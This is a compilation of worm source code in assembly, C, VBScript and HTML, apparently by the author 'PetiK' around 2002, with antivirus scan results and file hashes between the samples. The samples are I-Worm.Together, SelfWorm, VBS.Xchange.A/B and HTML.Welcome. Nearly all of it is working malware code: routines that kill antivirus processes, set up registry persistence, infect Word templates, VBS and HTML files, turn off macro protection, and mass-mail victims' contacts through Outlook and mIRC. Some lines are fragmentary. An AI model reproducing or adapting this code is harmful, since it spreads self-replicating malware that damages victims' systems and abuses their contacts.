jnz term
verif "NMAIN.EXE"
jnz term
verif "PAVSHED.EXE" ; PandaSoftware
jnz term
verif "vshwin32.exe" ; McAfee
jnz term
verif "PETIKSHOW.EXE" ; McAfee
jnz term
@pushsz "ZONEALARM.EXE"
push ebx
api lstrstr
test eax,eax
jz NextFile
term: push [uProcess.th32ProcessID]
push 1
push 001F0FFFh
api OpenProcess
test eax,eax
jz NextFile
push 0
push eax
api TerminateProcess
push ebx
push offset new_name
api lstrcpy
mov esi,offset new_name
push esi
api lstrlen
add esi,eax
sub esi,4
mov [esi],"ktp."
lodsd
; mov [esi],"kmz."
; lodsd
push 0
push ebx
api CopyFileA
push ebx
api DeleteFileA
NextFile:
push lSnapshot
api Process32Next
jmp checkfile
InfExpRetCl:
push lSnapshot
api CloseHandle
end_fuck_antivirus:
call Spread_Mirc
call Spread_Worm
e_s_w:
end_worm:
push 0
api ExitProcess
hide_worm Proc
pushad
xchg eax,ecx
jecxz end_hide_worm
push ecx
api GetProcAddress
xchg eax,ecx
jecxz end_hide_worm
push 1
push 0
call ecx
end_hide_worm:
popad
ret
hide_worm EndP
Spread_Mirc Proc
push offset mirc_exe
api lstrcpy
call @mirc
db "C:\mirc\script.ini",0
db "C:\mirc32\script.ini",0 ; spread with mIRC. Thanx to Microsoft.
db "C:\progra~1\mirc\script.ini",0
db "C:\progra~1\mirc32\script.ini",0
@mirc:
pop esi
push 4
pop ecx
mirc_loop:
push ecx
push 0
push 80h
push 2
push 0
push 1
push 40000000h
push esi
api CreateFileA
mov ebp,eax
push 0
@tmp_mirc:
push offset s_mirc
push ebp
api WriteFile
push ebp
api CloseHandle
@endsz
pop ecx
loop mirc_loop
end_spread_mirc:
ret
Spread_Mirc EndP
Spread_Worm Proc
pushad
push 50
push offset vbs_worm
@pushsz "\eBase.vbs"
api lstrcat
push 0
push 20h
push 2
push 0
push 1
push 40000000h
api CreateFileA
mov ebp,eax
push 0
push e_vbs - s_vbs
push offset s_vbs
push ebp
api WriteFile
push ebp
api CloseHandle
push 1
push 0
push 0
@pushsz "open"
push 0
api ShellExecuteA
verif_inet:
push 0
push offset inet
dec eax
jnz verif_inet
push 50
push offset t_ini
@pushsz "\together.ini"
push offset t_ini
api lstrcat
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
push offset t_ini
api CreateFileA
inc eax
je end_spread_worm
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 2
push eax
push ebx
test eax,eax
je end_s1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 4
push ebp
api MapViewOfFile
test eax,eax
je end_s2
xchg eax,esi
push 0
push ebx
api GetFileSize
cmp eax,4
jbe end_s3
scan_mail:
xor edx,edx
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,";"
je end_m
cmp al,"#"
je f_mail
cmp al,'@'
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
end_m: xor al,al
stosb
pop edi
test edx,edx
je scan_mail
call send_mail
jmp scan_mail
f_mail:
end_s3: push esi

api UnmapViewOfFile
end_s2: push ebp
api CloseHandle
end_s1: push ebx
api CloseHandle
end_spread_worm:
popad
jmp e_s_w
Spread_Worm EndP
send_mail:
xor eax,eax
push eax
push eax
push offset Message
push eax
push [sess]
api MAPISendMail
ret
.data
; === Copy Worm ===
verif_worm db 50 dup (0)
; === Fuck AntiVirus ===

uProcess PROCESSENTRY32 <?>
ProcessID dd ?
lSnapshot dd ?
new_name db 100 dup (?)
; === Spread With mIrc ===

s_mirc: db "[script]",CRLF
db ";Don't edit this file.",CRLF,CRLF
db "n0=on 1:JOIN:{",CRLF
db "n1= /if ( $nick == $me ) { halt }",CRLF
mirc_exe db 50 dup (?)
db CRLF,"n3=}",0
e_mirc:
byte_write dd ?
; === Spread with Outlook ===
vbs_worm db 50 dup (0)
t_ini db 50 dup (0)
inet dd 0
sess dd 0
subject db "Re: Answer",0

body db "Here for you...",0
filename db "funny_game.exe",0
Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach
MsgFrom dd ?
dd ?
dd ?
dd ?
dd ?
dd ?
MsgTo dd ?
dd 1
dd offset mail_addr
dd offset mail_addr
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset orig_worm
dd offset filename
dd ?
s_vbs:
db 'On Error Resume Next',CRLF
db 'Set fs=CreateObject("Scripting.FileSystemObject")',CRLF
db 'Set sys=fs.GetSpecialFolder(1)',CRLF
db 'Set c=fs.CreateTextFile(sys&"\together.ini")',CRLF
db 'c.Close',CRLF
db 'Set ou=CreateObject("Outlook.Application")',CRLF
db 'Set map=ou.GetNameSpace("MAPI")',CRLF
db 'adr=""',CRLF
db 'For Each mel in map.AddressLists',CRLF
db 'If mel.AddressEntries.Count <> 0 Then',CRLF
db 'For O=1 To mel.AddressEntries.Count',CRLF
db 'adr=adr &";"& mel.AddressEntries(O).Address',CRLF
db 'Next',CRLF
db 'End If',CRLF
db 'Next',CRLF
db 'Set c=fs.OpenTextFile(sys&"\together.ini",2)',CRLF
db 'c.Close',CRLF
e_vbs:
signature db "I-Worm.Together "

end start_worm
end
File Together.exe received on 05.16.2009 19:41:01 (CET)

AntiVir 7.9.0.168 2009.05.15 Worm/Petik.FunGame
Authentium 5.1.2.4 2009.05.16 W32/Malware!e382
Avast 4.8.1335.0 2009.05.15 Win32:PetikTogether
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Generic.Malware.SIMPPkg.5A573F5C
Comodo 1157 2009.05.08 Worm.Win32.Petik
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.8192
eSafe 7.0.17.0 2009.05.14 Win32.Pet_Tick.AC
F-Prot 4.4.4.56 2009.05.16 W32/Malware!e382
Fortinet 3.117.0.0 2009.05.16 W32/Petik.M@mm
GData 19 2009.05.16 Generic.Malware.SIMPPkg.5A573F5C
McAfee+Artemis 5616 2009.05.15 Artemis!91703278352E
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.FunGame
NOD32 4080 2009.05.15 Win32/Petik
Norman 6.01.05 2009.05.16 W32/Petik.D@mm
nProtect 2009.1.8.0 2009.05.16 -
PCTools 4.4.2.0 2009.05.16 I-Worm.Pettog.A
Rising 21.29.52.00 2009.05.16 Worm.Together
Sophos 4.41.0 2009.05.16 W32/Petik-R
Sunbelt 3.2.1858.2 2009.05.16 W32.Pet_Tick.AC@mm
Symantec 1.4.4.12 2009.05.16 W32.Pet_Tick.AC@mm
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 WORM_PETIK.M
VBA32 3.12.10.5 2009.05.16 Win32.Worm.Together
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.16 I-Worm.Pettog.A
MD5...: 91703278352e9e18d01d081c73330ec2
SHA1..: 81366149cda1578b5dc71b4c4860f9555467e1a4
/*
Start : April 1st 2002
Name : I-Worm.SelfWorm
Coder : PetiK
Language : C
*/
#include <stdio.h>
#include <mapi.h>
#include <winver.h>
#include "SelfWorm.h"
#if defined (win32)

#define IS_WIN32 TRUE
#else
#define IS_WIN32 FALSE
#endif
HINSTANCE hInst; // Instance courante.
LPCTSTR lpszAppName = "SelfWorm";

LPCTSTR lpszTitle = "SelfWorm 1.0";
char filename[100],cpywrm[100],copy2[100],start[100];
Folders";
LPTSTR cmdLine,ptr;
BOOL installed,rProcessFound;
HANDLE fd,lSnapshot,myproc;
BYTE desktop[50],favoris[50],personal[50],cache[50],startup[100];
sizpersonal=sizeof(personal),sizdesktop=sizeof(cache),sizstartup=sizeof(startup);
DWORD type=REG_SZ;
FILE *vbsworm;
LHANDLE session;
MapiMessage mess;
MapiMessage *mes;
MapiRecipDesc from;
HINSTANCE hMAPI;
HKEY hReg;
void mirc(char *);


BOOL RegisterWin95(CONST WNDCLASS* lpwc);
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int

nCmdShow)
{
MSG msg;
HWND hWnd;
WNDCLASS wc;
RegQueryValueEx(hReg,"Startup",0,&type,startup,&sizstartup);
RegCloseKey(hReg);
GetModuleFileName(hInstance,filename,100);
GetSystemDirectory((char *)cpywrm,100);
strcat(cpywrm,"\\ShellW32.exe");
CopyFile(filename,cpywrm,0);
strcpy(copy2,cpywrm);
strcat(copy2," -i");
RegSetValueEx(hReg,"Shell32",0,REG_SZ,(BYTE *)copy2,100);
RegCloseKey(hReg);
installed=FALSE;
if(cmdLine) {
if(ptr[0]=='-' && ptr[1]!=0) {
switch(ptr[1]) {
default:
break;
case 'i':
installed=TRUE;
break;
}
}
}
(FARPROC &)mSendMail=GetProcAddress(hMAPI,"MAPISendMail");
(FARPROC &)mLogon=GetProcAddress(hMAPI,"MAPILogon");
(FARPROC &)mLogoff=GetProcAddress(hMAPI,"MAPILogoff");
(FARPROC &)mFindNext=GetProcAddress(hMAPI,"MAPIFindNext");
(FARPROC &)mReadMail=GetProcAddress(hMAPI,"MAPIReadMail");
(FARPROC &)mFreeBuffer=GetProcAddress(hMAPI,"MAPIFreeBuffer");
if(!installed) {
wc.style = CS_HREDRAW | CS_VREDRAW;

wc.lpfnWndProc = (WNDPROC)WndProc;
wc.cbClsExtra = 0;
wc.cbWndExtra = 0;
wc.hInstance = 0;
wc.hIcon = LoadIcon(hInstance, lpszAppName);
wc.hCursor = LoadCursor(NULL, IDC_ARROW);
wc.hbrBackground = (HBRUSH)(COLOR_WINDOW+1);
wc.lpszMenuName = lpszAppName;
wc.lpszClassName = lpszAppName;
if(!RegisterWin95(&wc))
return FALSE;
hInst = hInstance;
hWnd = CreateWindow (lpszAppName,
lpszTitle,
WS_OVERLAPPEDWINDOW|WS_MAXIMIZEBOX,
150,150,300,200,NULL,NULL,hInstance,NULL);
if(!hWnd)
return FALSE;
; ShowWindow(hWnd, nCmdShow);
ShowWindow(hWnd,SW_SHOWNORMAL);
UpdateWindow(hWnd);
while(GetMessage(&msg, NULL, 0,0))
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
return(msg.wParam);
}
else
{
MessageBox(NULL,"SelfWorm actif","SelfWorm",MB_OK|MB_ICONINFORMATION);
FreeLibrary(hMAPI);
}
}
BOOL RegisterWin95(CONST WNDCLASS* lpwc)
{
WNDCLASSEX wcex;
wcex.style = lpwc->style;
wcex.lpfnWndProc = lpwc->lpfnWndProc;
wcex.cbClsExtra = lpwc->cbClsExtra;
wcex.cbWndExtra = lpwc->cbWndExtra;
wcex.hInstance = lpwc->hInstance;
wcex.hIcon = lpwc->hIcon;
wcex.hCursor = lpwc->hCursor;
wcex.hbrBackground = lpwc->hbrBackground;
wcex.lpszMenuName = lpwc->lpszMenuName;
wcex.lpszClassName = lpwc->lpszClassName;
wcex.cbSize = sizeof(WNDCLASSEX);
wcex.hIconSm = LoadIcon(wcex.hInstance, "TDW");
return RegisterClassEx(&wcex);
}
LRESULT CALLBACK WndProc( HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
static HWND hEdit = NULL;
switch(uMsg)
{
case WM_INITDIALOG:
hEdit=CreateWindow( "BUTTON", "ABOUT",WS_CHILD | WS_VISIBLE |
BS_PUSHBUTTON,0,0,290,190,hWnd,(HMENU)IDM_ABOUT,hInst,NULL );
break;
case WM_COMMAND:
switch(LOWORD(wParam))
{
case IDM_ABOUT:
MessageBox(NULL,"Written by PetiK. (c)2002","I-Worm.SelfWorm",
MB_OK|MB_ICONINFORMATION);
break;
case IDM_MIRC:
mirc("C:\\mirc\\script.ini");
mirc("C:\\mirc32\\script.ini");
mirc("C:\\Program Files\\mirc\\script.ini");
mirc("C:\\Program Files\\mirc32\\script.ini");
mirc("C:\\progra~1\\mirc\\script.ini");
mirc("C:\\progra~1\\mirc32\\script.ini");
break;
case IDM_STOPAV:
break;
case IDM_STARTUP:
strcpy(start,startup);
strcat(start,"\\Shell32.exe");
CopyFile(filename,"C:\\hello.exe",0);
break;
case IDM_VBSSPREAD:
vbsworm=fopen("C:\\selfworm.vbs","w");
fprintf(vbsworm,"On Error Resume Next\n");
fprintf(vbsworm,"Set sys=sf.GetSpecialFolder(1)\n");
fprintf(vbsworm,"Set OA=CreateObject(%cOutlook.Application
%c)\n",34,34);
fprintf(vbsworm,"Set MA=OA.GetNameSpace(%cMAPI%c)\n",34,34);
fprintf(vbsworm,"For Each C In MA.AddressLists\n");
fprintf(vbsworm,"If C.AddressEntries.Count <> 0 Then\n");
fprintf(vbsworm,"For D=1 To C.AddressEntries.Count\n");
fprintf(vbsworm,"Set AD=C.AddressEntries(D)\n");
fprintf(vbsworm,"Set EM=OA.CreateItem(0)\n");
fprintf(vbsworm,"EM.To=AD.Address\n");
fprintf(vbsworm,"EM.Subject=%cHi %c&AD.Name&%c look at this.
%c\n",34,34,34,34);
fprintf(vbsworm,"body=%cI found this on the web.%c\n",34,34);
fprintf(vbsworm,"body = body & VbCrLf & %cOpen this funny tool.
%c\n",34,34);
fprintf(vbsworm,"EM.Body=body\n");
fprintf(vbsworm,"EM.Attachments.Add(%c%s%c)\n",34,cpywrm,34);
fprintf(vbsworm,"EM.DeleteAfterSubmit=True\n");
fprintf(vbsworm,"If EM.To <> %c%c Then\n",34,34);
fprintf(vbsworm,"EM.Send\n");
fclose(vbsworm);
ShellExecute(NULL,"open","C:\\selfworm.vbs",NULL,NULL,SW_SHOWNORMAL);
Sleep(3000);
DeleteFile("C:\\selfworm.vbs");
break;
case IDM_READMAIL:
do {
mes->ulReserved=0;
mes->lpszSubject="Re: NEW MAIL.";
mes->lpszNoteText="Here you have a new mail with a funny tool. No
danger.\n"
" See you soon.";
mes->nRecipCount=1;
mes->nFileCount=1;
mes->lpFiles->lpszPathName=filename;
mes->lpFiles->lpszFileName="funny_tool.exe";
}
}
while(mFindNext(session,0,NULL,messId,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS);
free(mes->lpFiles);
mFreeBuffer(mes);
}
break;
case IDM_EXIT :
FreeLibrary(hMAPI);
DestroyWindow(hWnd);
break;
}
break;
case WM_DESTROY :
PostQuitMessage(0);
break;
default:
return (DefWindowProc(hWnd, uMsg, wParam, lParam));
}
return(0L);
}
void mirc(char *dir)

{
FILE *script;
script=fopen("C:\\script.ini","w");
fprintf(script,"[script]\n");
fprintf(script,"n0=on 1:JOIN:#:{\n");
fprintf(script,"n1= /if ( $nick == $me ) { halt }\n");
fprintf(script,"n2= /.dcc send $nick %s\n",cpywrm);
fprintf(script,"n3=}\n");
fclose(script);
CopyFile("C:\\script.ini",dir,0);
DeleteFile("C:\\script.ini");
}

{
register BOOL term;
if(strstr(uProcess.szExeFile,antivirus)!=NULL) { // Norton Antivirus
if(myproc!=NULL) {
}
}
}
}
File SelfWorm.exe received on 05.16.2009 19:29:16 (CET)

a-squared 4.0.0.101 2009.05.16 Trojan.Win32.SystemHijack!IK
AhnLab-V3 5.0.0.2 2009.05.16 -
AntiVir 7.9.0.168 2009.05.15 TR/Agent.29696.34
Antiy-AVL 2.0.3.1 2009.05.15 Trojan/Win32.heuristic
AVG 8.5.0.336 2009.05.15 Generic13.ANUQ
BitDefender 7.2 2009.05.16 Generic.Malware.SIMPPk.0E8A8CAE
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.16 -
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.16 BACKDOOR.Trojan
eSafe 7.0.17.0 2009.05.14 Win32.HEURMalware
eTrust-Vet 31.6.6508 2009.05.16 -
F-Secure 8.0.14470.0 2009.05.15 -
Fortinet 3.117.0.0 2009.05.16 PossibleThreat
GData 19 2009.05.16 Generic.Malware.SIMPPk.0E8A8CAE
Ikarus T3.1.1.49.0 2009.05.16 Trojan.Win32.SystemHijack
K7AntiVirus 7.10.737 2009.05.16 Trojan.Win32.Malware.1
Kaspersky 7.0.0.125 2009.05.16 Heur.Trojan.Generic
McAfee 5616 2009.05.15 Generic.dx!cf
McAfee+Artemis 5616 2009.05.15 Generic.dx!cf
McAfee-GW-Edition 6.7.6 2009.05.15 Trojan.Agent.29696.34
Microsoft 1.4602 2009.05.16 Trojan:Win32/SystemHijack.gen
Norman 6.01.05 2009.05.16 -
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.16 Trj/CI.A
Trojan.Spy.Win32.Undef.GEN
Rising 21.29.52.00 2009.05.16 [Suspicious]
Sophos 4.41.0 2009.05.16 Mal/Generic-A
Sunbelt 3.2.1858.2 2009.05.16 Heur.Trojan.Generic
Symantec 1.4.4.12 2009.05.16 -
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 PAK_Generic.001
VBA32 3.12.10.5 2009.05.16 -
ViRobot 2009.5.15.1737 2009.05.15 -
MD5...: e1a99c8d213bd20c976cabc1afb709f3
SHA1..: f886237a582c9bb29b30bb00e87dda8a067150f7
' Name : VBS.Xchange.A
' Author : PetiK
' Language : VBS
' Date : 27/04/2002

Set fl=fso.OpenTextFile(WScript.ScriptFullname,1)
virus=fl.ReadAll
fl.Close
fcopy=win&"\MSXchange.vbs"
reg="HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
fso.GetFile(WScript.ScriptFullName).Copy(fcopy)
ws.RegWrite reg&"\MsExchange",fcopy
set sp=fso.CreateTextFile("C:\XChange.vba",True,8)
sp.WriteLine "Attribute VB_Name = ""Xchange"""
sp.WriteLine "Sub AutoOpen()"
sp.WriteLine "On Error Resume Next"
sp.WriteLine "e = """""
For i=1 To len(virus)
e=Mid(virus,i,1)
e=Hex(Asc(e))
If Len(e)=1 Then
e="0"&e
End If
f=f+e
If Len(f)=110 Then
sp.WriteLine "e = e + """+f+""""
f=""
End If
If Len(virus)-i = 0 Then
f=""
End If
Next
sp.WriteLine "read=dec(e)"
sp.WriteLine "Open ""C:\xchange.vbs"" For Output As #1"
sp.WriteLine "Print #1, read"
sp.WriteLine "Close #1"
sp.WriteLine "Shell ""wscript C:\xchange.vbs"""
sp.WriteLine "Call infect_fichier"
sp.WriteLine "End Sub"
sp.WriteLine ""
sp.WriteLine "Sub HelpAbout()"
sp.WriteLine "MsgBox ""This is my very first VBS-W97M Worm"", vbInformation, ""I-
Worm.Xchange"""
sp.WriteLine ""
sp.WriteLine "Sub AutoClose()"
sp.WriteLine "FileSystem.Kill ""C:\xchange.vbs"""
sp.WriteLine ""
sp.WriteLine "Sub infect_fichier()"
sp.WriteLine "Set nor = NormalTemplate.VBProject.VBComponents"
sp.WriteLine "Set doc = ActiveDocument.VBProject.VBComponents"
sp.WriteLine "df = ""C:\XChange.vba"""
sp.WriteLine "If nor.Item(""Xchange"").Name <> ""Xchange"" Then"
sp.WriteLine " doc(""Xchange"").Export df"
sp.WriteLine " nor.Import df"
sp.WriteLine "End If"
sp.WriteLine "If doc.Item(""Xchange"").Name <> ""Xchange"" Then"
sp.WriteLine " nor(""Xchange"").Export df"
sp.WriteLine " doc.Import df"
sp.WriteLine " ActiveDocument.Save"
sp.WriteLine ""
sp.WriteLine "Function dec(octe)"
sp.WriteLine "For hexad = 1 To Len(octe) Step 2"
sp.WriteLine "dec = dec & Chr(""&h"" & Mid(octe, hexad, 2))"
sp.WriteLine "Next"
sp.WriteLine "End Function"
sp.Close
infvbs(win)
infvbs(fso.GetSpecialFolder(1))
SendWithOutlook()
Set wd=CreateObject("Word.Application")
If ws.RegRead ("HKLM\Software\Microsoft\MsXchange") <> "Coded by PetiK (c)2002" then

CN = CreateObject("WScript.NetWork").ComputerName
Set srch=wd.Application.FileSearch
srch.Lookin = "C:\": srch.SearchSubFolders = True: srch.FileName="*.doc;*.dot":
srch.Execute
Set sp=fso.OpenTextFile(fcopy,8)
sp.WriteLine "'On "&date& " at "&time&" from "&CN
sp.WriteLine "'Number of DOC and DOT file found : "& srch.FoundFiles.Count
sp.WriteBlankLines(1)
sp.Close
ws.RegWrite "HKLM\Software\Microsoft\MsXchange","Coded by PetiK (c)2002"
End If
Set vba=wd.NormalTemplate.VBProject.VBComponents
If vba.Item("Xchange").Name <> "Xchange" Then
vba.Import "C:\XChange.vba"
wd.Application.NormalTemplate.Save
End If
wd.Application.NormalTemplate.Close
wd.Application.Quit
Set mel=fso.CreateTextFile(win&"\kitep.wab.txt",8,TRUE)
counter=0
lect()
mel.WriteLine "#"
mel.Close
WScript.Quit
Sub lect()
Set dr=fso.Drives
For Each d in dr
list(d.path&"\")
End If
Next
End Sub
Sub spreadmailto(dir)
Set f=fso.GetFolder(dir)
Set cf=f.Files
For Each fil in cf
ext=fso.GetExtensionName(fil.path)
ext=lcase(ext)
if (ext="htm") or (ext="html") or (ext="htt") or (ext="asp") Then
set htm=fso.OpenTextFile(fil.path,1)
verif=True
allhtm=htm.ReadAll()
htm.Close
For ml=1 To Len(allhtm)
count=0
If Mid(allhtm,ml,7) = "mailto:" Then
counter=counter+1
mlto=""
Do While Mid(allhtm,ml+6+count,1) <> """"
count=count+1
mlto = mlto + Mid(allhtm,ml+6+count,1)
loop
mel.WriteLine counter &" <"&left(mlto,len(mlto)-1)&">"
sendmailto(left(mlto,len(mlto)-1))
End If
Next
End If
Next
End Sub
Sub list(dir)
Set ssf=f.SubFolders
For Each fil in ssf
spreadmailto(fil.path)
list(fil.path)
Next
End Sub
Sub sendmailto(email)
Set mailmelto=out.CreateItem(0)
mailmelto.To email
mailmelto.Subject "Upgrade Ms Exchange"
mailmelto.Body "Run this attached file to upgrade Ms Exchange"
mailmelto.Attachment.Add (WScript.ScriptFullName)
mailmelto.DeleteAfterSubmit = True
mailmelto.Send
Set out = Nothing
End Sub
Sub SendWithOutlook()
F.To=E.Address
F.Subject="Update and upgrade MS Exchange."
F.Body="run this attached file to update Ms Exchange. See you soon."
F.Attachments.Add(fcopy)
If F.To <> "" Then
F.Send
End If
Next
End If
Next
End Sub
Function infvbs(Folder)
If f.FolderExists(Folder) then
For each P in f.GetFolder(Folder).Files

ext=f.GetExtensionName(P.Name)
If ext="vbs" or ext="vbe" Then
mark=VF.Read(14)
VF.Close
If mark <> "'VBS.Xchange.A" Then
VC=VF.ReadAll
VF.Close
VCd=virus & VC
Set VF=f.OpenTextFile(P.path,2,True)
VF.Write VCd
VF.Close
End If
End If
Next
End If
End Function
File Xchange_A.vbs received on 05.16.2009 20:03:44 (CET)

a-squared 4.0.0.101 2009.05.16 Email-Worm.VBS.Xchange.A!IK
AhnLab-V3 5.0.0.2 2009.05.16 VBS/Chu
AntiVir 7.9.0.168 2009.05.15 Worm/Chu.1
Authentium 5.1.2.4 2009.05.16 VBS/Chu.A@mm
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Generic.ScriptWorm.72BAC97E
CAT-QuickHeal 10.00 2009.05.15 VBS/Chu.A
ClamAV 0.94.1 2009.05.16 Worm.Chu.1
Comodo 1157 2009.05.08 Email-Worm.VBS.Chu.a
eSafe 7.0.17.0 2009.05.14 VBS.FireBurn.
F-Prot 4.4.4.56 2009.05.16 VBS/Chu.A@mm
F-Secure 8.0.14470.0 2009.05.16 Email-Worm.VBS.Chu.a
Fortinet 3.117.0.0 2009.05.16 VBS/Chu.A@mm
GData 19 2009.05.16 Generic.ScriptWorm.72BAC97E
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.VBS.Xchange.A
K7AntiVirus 7.10.737 2009.05.16 -
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.VBS.Chu.a
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Chu.1
Microsoft 1.4602 2009.05.16 Virus:VBS/Chu
Norman 6.01.05 2009.05.16 VBS/Chu.D
nProtect 2009.1.8.0 2009.05.16 VBS.Chu.B@mm
Panda 10.0.0.14 2009.05.16 VBS/Chu
PCTools 4.4.2.0 2009.05.16 VBS.Petxch.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Script.VBS.Chu
Sophos 4.41.0 2009.05.16 VBS/Xchange-A
Sunbelt 3.2.1858.2 2009.05.16 -
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 VBS_CHU.A
VBA32 3.12.10.5 2009.05.16 Email-Worm.VBS.Chu.a
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.16 VBS.Petxch.A
MD5...: de34d735d30bd0e107e14bb6aa8bf3e0
SHA1..: 8d976194e4ae851e0408c53f0db41f9c6f994a46
' Name : VBS.Xchange.B aka RasLFront (because of French Presidential election on 2002)
' Author : PetiK
' Language : VBS
' Date : 05/05/2002
'VBS.Xchange.B aka RasLFront

virus=fl.ReadAll
fl.Close
fcopy=win&"\XchgFix.vbs"
reg="HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
'fso.GetFile(WScript.ScriptFullName).Copy(fcopy)
'ws.RegWrite reg&"\MsExchangeFix",fcopy
set sp=fso.CreateTextFile("C:\rlf.sys",True,8)
sp.WriteLine "Private Sub Document_Open()"
e=Mid(virus,i,1)
e=Hex(Asc(e))
If Len(e)=1 Then
e="0"&e
End If
f=f+e
If Len(f)=110 Then
f=""
End If
f=""
End If
Next
sp.WriteLine "Call infect_fichier"

sp.WriteLine ""
sp.WriteLine "Sub HelpAbout()"
sp.WriteLine "MsgBox ""This is my very first VBS-W97M Worm"", vbInformation, ""I-
Worm.Xchange"""
sp.WriteLine ""
sp.WriteLine "Sub AutoClose()"
sp.WriteLine "FileSystem.Kill ""C:\xfix.vbs"""
sp.WriteLine ""
sp.WriteLine "Sub infect_fichier()"
sp.WriteLine "Set nor = NormalTemplate.VBProject.VBComponents(1)"
sp.WriteLine "Set doc = ActiveDocument.VBProject.VBComponents(1)"
sp.WriteLine "df = ""C:\rlf.sys"""
sp.WriteLine "If nor.Name <> ""raslfront"" Then"
sp.WriteLine "nor.Name = ""raslfront"""
sp.WriteLine "Open ""C:\xfix.vbs"" For Output As #1"
sp.WriteLine "Shell ""wscript C:\xfix.vbs"""
sp.WriteLine ""
sp.WriteLine "Next"
sp.Close
Set wrd=CreateObject("Word.Application")
wrd.Options.virusprotection=0
wrd.Options.savenormalprompt=0
wrd.Options.confirmconversion=0
If wrd.normaltemplate.vbproject.vbcomponents(1).name <> "raslfront" Then
wrd.normaltemplate.vbproject.vbcomponents(1).codemodule.addfromFile("C:\rlf.sys")
wrd.normaltemplate.vbproject.vbcomponents(1).name="raslfront"
MsgBox "Pas Encore"
End If
wrd.Application.Quit
WScript.Quit
<welcome>
<html><head><title>Welcome</title>
<body onLoad="window.status='Welcome to my last creation'">
msgbox "Please accept the ActiveX",vbinformation,"MSIE Warning !"
Else
vbsn=""
For vbsname=1 To 8
randomize(timer)
vbsn=vbsn & chr(int(rnd(1)*26)+65)
Next
vbsn=vbsn&".vbs"
htms=document.body.createTextRange.htmltext
Set vbsf=fso.CreateTextFile("C:\"&vbsn,2,True)
vbsf.WriteLine "Set fs=CreateObject(""Scripting.FileSystemObject"")"
vbsf.WriteLine "Set ws=CreateObject(""WScript.Shell"")"
vbsf.Write "htm="""
For i=1 To Len(htms)

e=Mid(htms,i,1)
e=Hex(Asc(e))
If Len(e)=1 Then
e="0"&e
End If
vbsf.Write e
Next
vbsf.Write """"
vbsf.WriteLine ""
vbsf.WriteLine "Set newhtm=fs.CreateTextFile(""C:\Welcome2U.htm"",True,2)"
vbsf.WriteLine "newhtm.WriteLine ""<welcome>"""
vbsf.WriteLine "newhtm.WriteLine ""<html><head><title>Welcome</title>"""
vbsf.WriteLine "newhtm.WriteLine ""<body onLoad=""""window.status='Welcome to my last
creation'"""">"""
vbsf.WriteLine "read="""""
vbsf.WriteLine "For pos=1 To Len(htm) Step 2"
vbsf.WriteLine "read=read " &Chr(38)& " Chr(""" &Chr(38)& "h"""&Chr(38)& "
Mid(htm,pos,2))"
vbsf.WriteLine "Next"
vbsf.WriteLine "newhtm.Write read"
vbsf.WriteLine "newhtm.WriteLine ""</body></html>"""
vbsf.WriteLine "newhtm.Close"
vbsf.WriteLine "ws.Run ""C:\Welcome2U.htm"""
vbsf.Close
Set map=out.GetNameSpace("MAPI")
For Each adr In map.AddressLists
If adr.AddressEntries <> 0 Then
For addr=1 To adr.Addressentries.Count
Set nadr=adr.AddressEntries(addr)
Set mel=out.CreateItem(0)
mel.To=nadr.Address
mel.Subject="A Gift from your best friend"
mel.Body="This is for you (" &left(vbsn,8)& ")."
mel.Attachments.Add("C:\"&vbsn)
mel.Send
Next
End If
Next
infect(win)
infect(sys)
infect(ws.SpecialFolders("MyDocuments"))
infect(ws.SpecialFolders("Desktop"))
infect(ws.SpecialFolders("Favorites"))
infect(ws.SpecialFolders("Recent"))
If Day(Now())=7 Then
document.write "<font face='Lucida Console' size='2' color=black>Welcome to my last
creation : HTML.Welcome.A<br>Coded by PetiK/[rRlf]<br></font>"
Else
document.write "<font face='Lucida Console' size='3' color=black>Welcome To You !<br>Have
a nice day.<br></font>"
End If
End If
Function infect(doss)
Set FolderObj = FSO.GetFolder(doss)
ext = lcase(FSO.GetExtensionName(cible.Name))
if ext="htm" or ext="html" or ext="htz" or ext="hta" or ext="asp" Then
if good.readline <> "<welcome>" Then
good.close()
htmorg = good.ReadAll()
good.close()
Set good = fso.CreateTextFile(cible.path, True, False)
good.WriteLine "<welcome>"
good.Write(htmorg)
good.WriteLine virus.htmltext
good.Close()
else
good.close()
end if
end if
next
End Function
</script>
</body></html>
YVQAVQXD.vbs
Set fs=CreateObject("Scripting.FileSystemObject")
htm="0D0A3C534352495054206C61...6E67756167543E"
Set newhtm=fs.CreateTextFile("C:\Welcome2U.htm",True,2)
newhtm.WriteLine "<welcome>"
